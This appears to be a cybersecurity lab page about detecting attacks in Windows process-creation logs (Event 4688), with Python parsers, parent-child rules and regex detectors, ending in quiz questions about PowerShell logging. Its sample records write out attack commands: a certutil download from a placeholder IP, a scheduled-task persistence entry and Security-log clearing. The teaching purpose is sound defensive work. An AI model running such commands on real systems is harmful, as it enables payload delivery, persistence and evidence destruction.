Loopus



PowerShell Logging

30 min
lab
+50 XP

Learning Objectives

  • Track process execution through event logs
  • Analyze process creation chains
  • Detect suspicious process behaviors

Process Tracking Analysis

Process tracking events reveal what actually executes on a Windows system. Authentication events show who accessed a system; process events show what they did there: the actual commands, scripts, and tools involved in both legitimate work and attacks.

Process Creation Events

Event ID 4688 logs process creation. By default the record carries only the process name and the user; with command-line logging enabled it also captures the full command line, which greatly increases its investigative value.

Enable command line logging through Group Policy: Computer Configuration > Administrative Templates > System > Audit Process Creation > Include command line in process creation events.

The process creation record includes:

  • NewProcessName - Full path to the executable

  • CommandLine - Arguments passed to the process

  • ParentProcessName - Process that started this one

  • SubjectUserName - User context for execution

  • TokenElevationType - Whether running elevated
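
The record layout above, worked through as an added example that is not part of the lesson's own material: a Python parser for a 4688 event in the XML form that `Get-WinEvent`'s `ToXml()` returns. It pulls out the fields listed, decodes the `TokenElevationType` resource strings (`%%1936`, `%%1937`, `%%1938` are the Security log's strings for the three elevation types), and includes a sanity check that catches the common case where command-line logging was never enabled. The sample event, host name, user and paths are constructed.

```python
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Constructed sample event in the XML form returned by Get-WinEvent's ToXml();
# the host name, user and paths are made up for this example.
SAMPLE_4688_XML = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing"/>
    <EventID>4688</EventID>
    <TimeCreated SystemTime="2024-03-01T10:15:30.000000000Z"/>
    <Computer>WS01.example.local</Computer>
  </System>
  <EventData>
    <Data Name="SubjectUserName">alice</Data>
    <Data Name="SubjectDomainName">EXAMPLE</Data>
    <Data Name="NewProcessId">0x1a2c</Data>
    <Data Name="NewProcessName">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
    <Data Name="TokenElevationType">%%1938</Data>
    <Data Name="ProcessId">0x0f44</Data>
    <Data Name="CommandLine">powershell.exe -NoProfile -File C:\Scripts\inventory.ps1</Data>
    <Data Name="ParentProcessName">C:\Windows\explorer.exe</Data>
  </EventData>
</Event>"""

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Resource strings the Security log uses for TokenElevationType.
TOKEN_ELEVATION = {
    "%%1936": "Default (type 1: no split token, e.g. UAC disabled or a service account)",
    "%%1937": "Full (type 2: elevated token)",
    "%%1938": "Limited (type 3: standard user token)",
}


@dataclass
class ProcessCreation:
    time: str
    computer: str
    user: str            # DOMAIN\SubjectUserName
    new_process: str     # NewProcessName
    command_line: str    # CommandLine; empty unless command-line logging is enabled
    parent_process: str  # ParentProcessName; absent on pre-Windows 10 / Server 2016 hosts
    elevation: str       # decoded TokenElevationType
    pid: int             # NewProcessId (hex string in the event)
    ppid: int            # ProcessId, i.e. the creator's PID (hex string in the event)


def parse_4688(xml_text: str) -> ProcessCreation:
    """Parse one 4688 event; raise ValueError for any other event ID."""
    root = ET.fromstring(xml_text)
    event_id = root.findtext("e:System/e:EventID", namespaces=NS)
    if event_id != "4688":
        raise ValueError(f"expected EventID 4688, got {event_id}")
    # EventData is a flat list of <Data Name="...">value</Data> elements.
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    created = root.find("e:System/e:TimeCreated", NS)
    elevation_code = data.get("TokenElevationType", "")
    return ProcessCreation(
        time=created.get("SystemTime", "") if created is not None else "",
        computer=root.findtext("e:System/e:Computer", default="", namespaces=NS),
        user=f"{data.get('SubjectDomainName', '')}\\{data.get('SubjectUserName', '')}",
        new_process=data.get("NewProcessName", ""),
        command_line=data.get("CommandLine", ""),
        parent_process=data.get("ParentProcessName", ""),
        elevation=TOKEN_ELEVATION.get(elevation_code, elevation_code),
        pid=int(data.get("NewProcessId", "0x0"), 16),
        ppid=int(data.get("ProcessId", "0x0"), 16),
    )


def command_line_logging_enabled(records) -> bool:
    """Sanity check for a batch of parsed events: if every CommandLine is empty,
    the Group Policy setting from the lesson is almost certainly not applied."""
    return any(r.command_line for r in records)


if __name__ == "__main__":
    rec = parse_4688(SAMPLE_4688_XML)
    print(f"{rec.time} {rec.computer} {rec.user}: {rec.parent_process} -> {rec.new_process}")
    print(f"  cmd: {rec.command_line or '<not logged>'}  elevation: {rec.elevation}")
```

Run `command_line_logging_enabled` over the first batch you pull from a host before investing time in command-line rules; an all-empty `CommandLine` column means the policy in the paragraph above has not reached that machine.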


Parent-Child Relationships

Process relationships reveal attack chains. Normal processes have expected parents:

  • cmd.exe typically has explorer.exe or another shell as parent

  • powershell.exe typically has explorer.exe, cmd.exe, or another expected launcher

  • Office applications should not spawn cmd.exe or powershell.exe


Unusual parent-child relationships often indicate malicious activity:

  • Word spawning PowerShell - Classic macro-based malware behavior
  • services.exe spawning cmd.exe - Possible malicious service
  • WmiPrvSE.exe spawning processes - WMI-based execution
  • svchost.exe with unexpected children - Process injection or malicious service
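
The parent-child rules above and the chain reconstruction from the learning objectives, as an added example rather than lesson material: each 4688 record is reduced to its PID, creator PID, image and parent image, the four unusual relationships listed are checked, and the creator-PID links are walked back to render the full ancestry. The sample records, the office application set, the expected-launcher sets and the `svchost.exe` child baseline are all constructed assumptions; a real baseline should come from your own clean hosts.

```python
import ntpath
from dataclasses import dataclass


@dataclass
class Proc:
    """The subset of 4688 fields needed for chain analysis (values constructed below)."""
    pid: int           # NewProcessId
    ppid: int          # ProcessId (creator's PID)
    image: str         # NewProcessName
    parent_image: str  # ParentProcessName


# Constructed sample: a macro-style chain (explorer > WINWORD > powershell), a
# cmd.exe started by services.exe, and a benign cmd.exe started from the desktop.
SAMPLE_RECORDS = [
    Proc(0x1000, 0x0800, r"C:\Windows\explorer.exe", r"C:\Windows\System32\userinit.exe"),
    Proc(0x2000, 0x1000, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
         r"C:\Windows\explorer.exe"),
    Proc(0x2100, 0x2000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
    Proc(0x3000, 0x0400, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\services.exe"),
    Proc(0x4000, 0x1000, r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe"),
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Launchers the lesson calls expected; an assumed starting point, extend per environment.
EXPECTED_PARENTS = {
    "cmd.exe": {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe"},
    "powershell.exe": {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe"},
}
# Assumed baseline of svchost.exe children; build the real list from clean hosts.
SVCHOST_EXPECTED_CHILDREN = {"taskhostw.exe", "dllhost.exe", "wermgr.exe",
                             "werfault.exe", "backgroundtaskhost.exe"}


def image_name(path: str) -> str:
    """Lower-cased file name so rules are independent of install path and case."""
    return ntpath.basename(path).lower()


def check_parent_child(rec: Proc) -> list:
    """Apply the lesson's parent-child rules to one record; return the findings."""
    child, parent = image_name(rec.image), image_name(rec.parent_image)
    findings = []
    if parent in OFFICE_APPS and child in SHELLS:
        findings.append(f"{parent} spawned {child}: macro-style execution")
    if parent == "services.exe" and child == "cmd.exe":
        findings.append("services.exe spawned cmd.exe: possible malicious service")
    if parent == "wmiprvse.exe":
        findings.append(f"WmiPrvSE.exe spawned {child}: WMI-based execution")
    if parent == "svchost.exe" and child not in SVCHOST_EXPECTED_CHILDREN:
        findings.append(f"svchost.exe spawned unexpected child {child}")
    if child in EXPECTED_PARENTS and parent not in EXPECTED_PARENTS[child]:
        findings.append(f"{child} started by unexpected parent {parent}")
    return findings


def build_chain(records: list, pid: int) -> str:
    """Walk creator PIDs back through the records and render the ancestry as a chain.
    Assumes no PID reuse inside the batch; on a real host, bound the batch by time."""
    by_pid = {r.pid: r for r in records}
    chain, seen, cur, last = [], set(), by_pid.get(pid), None
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(image_name(cur.image))
        last, cur = cur, by_pid.get(cur.ppid)
    if cur is None and last is not None and last.parent_image:
        chain.append(image_name(last.parent_image))  # parent predates the batch
    return " > ".join(reversed(chain))


def triage(records: list) -> dict:
    """Map PID -> (chain, findings) for every record that trips at least one rule."""
    return {r.pid: (build_chain(records, r.pid), check_parent_child(r))
            for r in records if check_parent_child(r)}


if __name__ == "__main__":
    for pid, (chain, findings) in triage(SAMPLE_RECORDS).items():
        print(f"PID {pid:#x}: {chain}")
        for finding in findings:
            print(f"    - {finding}")
```

The chain walk deliberately falls back to `ParentProcessName` when the creator's own 4688 record is older than the batch, which is the normal case for long-lived parents such as `explorer.exe` or `services.exe`.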

Common Attack Indicators

Living off the land binaries (LOLBins) - Legitimate Windows binaries abused for malicious purposes: certutil downloading files, mshta executing scripts, regsvr32 loading remote COM objects.

Encoded PowerShell commands - Base64-encoded commands often hide malicious activity. Look for -EncodedCommand or -enc flags.

Suspicious paths - Executables running from temp directories, public folders, or recycle bin locations.

Command line red flags - Downloading content (Invoke-WebRequest, certutil), disabling security features (Set-MpPreference), clearing logs (wevtutil), establishing persistence (schtasks, reg add).
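
The four indicator families above (LOLBins, encoded PowerShell, suspicious paths, command-line red flags), worked through as an added example that is not part of the lesson: each rule is a regular expression over the 4688 `CommandLine` or `NewProcessName`, and the encoded-command check decodes the payload the way PowerShell does (Base64 over UTF-16LE) so the analyst sees the script rather than the blob. The sample records, the documentation IP address and all paths are constructed, and the rule set is a starting point rather than a complete list.

```python
import base64
import binascii
import re

# Constructed sample (NewProcessName, CommandLine) pairs; hosts, IPs and paths are made up.
# The encoded payload is generated here from a harmless string so the decode can be checked.
SAMPLE_ENCODED = base64.b64encode("Write-Output 'lab test'".encode("utf-16-le")).decode()
SAMPLE_RECORDS = [
    (r"C:\Windows\System32\certutil.exe",
     r"certutil.exe -urlcache -split -f http://198.51.100.7/tool.bin C:\Users\Public\tool.exe"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     f"powershell.exe -NoP -W Hidden -enc {SAMPLE_ENCODED}"),
    (r"C:\Users\bob\AppData\Local\Temp\setup_tmp.exe", r"setup_tmp.exe /silent"),
    (r"C:\Windows\System32\wevtutil.exe", r'"C:\Windows\System32\wevtutil.exe" cl Security'),
    (r"C:\Windows\System32\schtasks.exe",
     r"schtasks /create /tn Updater /tr C:\Users\Public\tool.exe /sc onlogon"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"),
]

# LOLBin usage named in the lesson (certutil download, mshta script, regsvr32 remote COM).
LOLBIN_RULES = {
    "certutil download": re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache", re.I),
    "mshta script execution": re.compile(r"\bmshta(?:\.exe)?\b.*(?:https?:|javascript:|vbscript:)", re.I),
    "regsvr32 remote scriptlet": re.compile(r"\bregsvr32(?:\.exe)?\b.*/i:https?:", re.I),
}
# Command-line red flags from the lesson: download, defence tampering, log clearing, persistence.
RED_FLAG_RULES = {
    "download cradle": re.compile(r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile", re.I),
    "disabling Defender": re.compile(r"Set-MpPreference\b.*-Disable", re.I),
    "log clearing": re.compile(r"\bwevtutil(?:\.exe)?\b.*\b(?:cl|clear-log)\b", re.I),
    "persistence (scheduled task)": re.compile(r"\bschtasks(?:\.exe)?\b.*/create", re.I),
    "persistence (run key)": re.compile(r"\breg(?:\.exe)?\s+add\b.*\\run\b", re.I),
}
# Temp, public and recycle-bin locations, matched against NewProcessName.
SUSPICIOUS_DIR = re.compile(r"\\(?:temp|tmp|users\\public|\$recycle\.bin)\\", re.I)


def find_encoded_command(command_line: str):
    """Return the Base64 payload if the command line carries -EncodedCommand or any
    prefix abbreviation of it (-e, -ec, -enc, ...), otherwise None."""
    tokens = command_line.split()
    for flag, payload in zip(tokens, tokens[1:]):
        name = flag[1:].lower() if flag.startswith("-") else ""
        if name and "encodedcommand".startswith(name):
            return payload
    return None


def decode_encoded_command(payload: str):
    """PowerShell expects the payload to be Base64 over UTF-16LE text; None if it is not."""
    try:
        return base64.b64decode(payload, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_record(new_process_name: str, command_line: str) -> dict:
    """Run every rule over one 4688 record and return the indicators it trips."""
    indicators = [f"LOLBin: {label}" for label, rx in LOLBIN_RULES.items()
                  if rx.search(command_line)]
    indicators += [f"red flag: {label}" for label, rx in RED_FLAG_RULES.items()
                   if rx.search(command_line)]
    if SUSPICIOUS_DIR.search(new_process_name):
        indicators.append("executable launched from a suspicious directory")
    payload = find_encoded_command(command_line)
    decoded = None
    if payload is not None:
        indicators.append("encoded PowerShell command")
        decoded = decode_encoded_command(payload)  # None means the flag was there but undecodable
    return {"indicators": indicators, "decoded_command": decoded}


if __name__ == "__main__":
    for image, cmd in SAMPLE_RECORDS:
        result = analyze_record(image, cmd)
        if result["indicators"]:
            print(f"{image}\n  {', '.join(result['indicators'])}")
            if result["decoded_command"] is not None:
                print(f"  decoded: {result['decoded_command']}")
```

An `-EncodedCommand` flag whose payload does not decode is still worth a look: the function reports the indicator and returns `None` for the decoded text rather than dropping the record.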

Combine process monitoring with other data sources. Process execution context helps interpret network connections, file modifications, and other activities.

Answer the Questions

Question 1 (Knowledge): What is PowerShell logging?
Format: 13 characters, exact match required

Question 2 (Hands-On): What Event ID captures PowerShell scripts?
Format: 4 characters, exact match required

Question 3 (Knowledge): How do you detect malicious PowerShell?
Format: 10 characters, exact match required

Question 4 (Hands-On): What term describes hiding malicious code?
Format: 11 characters, exact match required
